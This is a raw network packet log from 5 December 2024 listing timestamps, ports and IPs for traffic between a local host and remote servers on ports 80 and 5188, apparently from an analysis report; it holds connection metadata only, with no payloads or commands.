Dec 5, 2024 17:32:14.536329031 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.536392927 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.536858082 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.536902905 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.537060022 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.537100077 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.537972927 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.538038969 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.538075924 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.538121939 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.539146900 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.539212942 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.539242983 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.539284945 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.540350914 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.540396929 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.540445089 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.541414022 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.541467905 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.542224884 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.542278051 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.542566061 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.542731047 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.542776108 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.543756962 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.543826103 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.544487953 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.544578075 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.545026064 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.545074940 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.545105934 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.545145035 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.546077967 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.546216011 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.546253920 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.547195911 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.547256947 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.547363997 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.547411919 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.548358917 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.548404932 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.548410892 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.548446894 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.549504995 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.549551010 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.549592972 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.549632072 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.550698042 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.551001072 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.551050901 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.551898003 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.551940918 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.552124023 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.552164078 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.552999973 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.553019047 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.553042889 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.553060055 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.554217100 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.554434061 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.554478884 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.555294037 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.555330038 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.555416107 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.555454969 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.556463957 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.556477070 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.556509972 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.556524038 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.557650089 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.557791948 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.557836056 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.558751106 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.558796883 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.558845043 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.559189081 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.559923887 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.559999943 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.560031891 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.560066938 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.561063051 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.561084032 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.561120033 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.561135054 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.562216997 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.562304974 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.562354088 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.563389063 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.563443899 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.563474894 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.563514948 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.564682007 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.564738035 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.564769983 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.564842939 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.565699100 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.565752983 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.565797091 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.566242933 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.566987038 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.567011118 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.567054033 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.568159103 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.568203926 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.568245888 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.568315029 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.569149971 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.569202900 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.569482088 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.569596052 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.570313931 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.570390940 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.570420980 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.570461988 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.571434975 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.571515083 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.571553946 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.571593046 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.572603941 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.572645903 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.572662115 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.572685003 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.573810101 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.573862076 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.574366093 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.574407101 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.574907064 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.574980974 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.575037003 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.575089931 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.576047897 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.576122046 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.576150894 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.576214075 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.577228069 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.577286959 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.577558041 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.577604055 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.578430891 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.578489065 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.578505039 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.578538895 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.580157042 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.580252886 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.580279112 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.580394983 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.580984116 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.581027031 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.581095934 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.581140041 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.582082987 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.582124949 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.582231045 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.582269907 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.583193064 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.583209038 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.583261967 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.583261967 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.583940029 CET	49800	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:14.584152937 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.584197998 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.584372997 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.584491968 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.585370064 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.585426092 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.585608959 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.585644960 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.586452961 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.586496115 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.586565971 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.586608887 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.587667942 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.587713957 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.587905884 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.587948084 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.588896036 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.588933945 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.588953018 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.588999987 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.589941025 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.589984894 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.590014935 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.590070963 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.591119051 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.591164112 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.591238976 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.591279030 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.592246056 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.592289925 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.592396021 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.592453003 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.593441010 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.593466043 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.593509912 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.594532967 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.594578981 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.594588041 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.594624043 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.595745087 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.595798016 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.595916986 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.595961094 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.596797943 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:14.596837044 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:14.618375063 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.618397951 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.618463993 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.618674994 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.618825912 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.618953943 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.619851112 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.619872093 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.619956970 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.620975018 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.621203899 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.621249914 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.622102976 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.622675896 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.622747898 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.622771978 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.623246908 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.623502970 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.623543978 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.624458075 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.624537945 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.624777079 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.625715017 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.625802994 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.625848055 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.626687050 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.627540112 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.627839088 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.627895117 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.628036022 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.628097057 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.628951073 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.629314899 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.629391909 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.630122900 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.630278111 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.630335093 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.631227016 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.631613016 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.631747007 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.632394075 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.632843971 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.632911921 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.633533955 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.633891106 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.633949995 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.634747028 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.635030031 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.635078907 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.635838032 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.636166096 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.636209011 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.637067080 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.637590885 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.637681961 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.638123035 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.638695955 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.638765097 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.639182091 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.639489889 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.639538050 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.640338898 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.640475035 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.640916109 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.641544104 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.641782045 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.641848087 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.642986059 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.643256903 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.643727064 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.643975019 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.644100904 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.644172907 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.644854069 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.645091057 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.645143986 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.646024942 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.646150112 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.646200895 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.647160053 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.647319078 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.647505045 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.648329020 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.648405075 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.648509026 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.649421930 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.649638891 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.649682045 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.650558949 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.650754929 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.650801897 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.651705980 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.651890039 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.651964903 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.652858973 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.653073072 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.653458118 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.654000998 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.654326916 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.654383898 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.655091047 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.655519009 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.656075954 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.656240940 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.656371117 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.656421900 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.657371044 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.657660961 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.657713890 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.658550024 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.658719063 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.658787966 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.659697056 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.659873009 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.659913063 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.660864115 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.661117077 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.661159992 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.661933899 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.661957979 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.662009954 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.663147926 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.663477898 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.663569927 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.664222956 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.664326906 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.664402008 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.666062117 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.666573048 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.666662931 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:14.667040110 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.667292118 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:14.667330980 CET	49792	5188	192.168.2.11	92.255.85.66
